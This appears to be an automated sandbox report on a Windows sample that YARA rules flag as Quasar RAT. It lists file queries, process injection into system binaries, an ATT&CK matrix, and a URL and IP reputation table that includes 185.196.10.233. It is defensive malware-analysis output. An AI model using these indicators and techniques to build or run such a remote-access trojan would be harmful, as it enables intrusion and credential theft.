Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Desktop\KxgGGaiW3E.exe

Code function: 0_2_00007FF7F30CE180 QueryPerformanceFrequency,GetSystemTimeAsFileTime,QueryPerformanceCounter,

0_2_00007FF7F30CE180

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Quasar RAT

Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.20599dba870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.3309899452.0000000007E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2488394877.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184893054.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3307610797.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2488394877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184893054.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3307610797.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KxgGGaiW3E.exe PID: 6612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ngen.exe PID: 4204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KxgGGaiW3E.exe PID: 7424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KxgGGaiW3E.exe PID: 2428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ilasm.exe PID: 7372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wmplayer.exe PID: 4408, type: MEMORYSTR

Remote Access Functionality

Yara detected Quasar RAT

Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.20599dba870.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17befad2b38.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b6961b2b38.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.2059a712b38.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.KxgGGaiW3E.exe.2b69585a870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.KxgGGaiW3E.exe.20599dba870.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.KxgGGaiW3E.exe.17bef17a870.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.3309899452.0000000007E66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2488394877.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184893054.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3307610797.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2488394877.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2184893054.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3307610797.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2117583475.000002B6955C1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2117583475.000002B695FC1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2407170841.0000017BEF8E1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2435090839.0000020599B21000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2435090839.000002059A521000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2407170841.0000017BEEEE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KxgGGaiW3E.exe PID: 6612, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ngen.exe PID: 4204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KxgGGaiW3E.exe PID: 7424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KxgGGaiW3E.exe PID: 2428, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ilasm.exe PID: 7372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wmplayer.exe PID: 4408, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	11 Registry Run Keys / Startup Folder	1 Access Token Manipulation	121 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	311 Process Injection	1 Modify Registry	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	11 Registry Run Keys / Startup Folder	11 Disable or Modify Tools	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	51 Virtualization/Sandbox Evasion	NTDS	51 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Access Token Manipulation	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	311 Process Injection	Cached Domain Credentials	35 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Deobfuscate/Decode Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	2 Obfuscated Files or Information	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
https://octokit.github.io/rest.js/#throttling	0%	URL Reputation	safe
https://ipwho.is/	0%	URL Reputation	safe
http://ipwho.isd	0%	Avira URL Cloud	safe
http://schemas.microst.	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://ipwho.is	0%	Avira URL Cloud	safe
https://learn-video.azurefd.net/	0%	Avira URL Cloud	safe
http://schemas.datacontract.org/2004/07/d	0%	Avira URL Cloud	safe
185.196.10.233	0%	Avira URL Cloud	safe
https://www.cafbaseline.com/	0%	Avira URL Cloud	safe
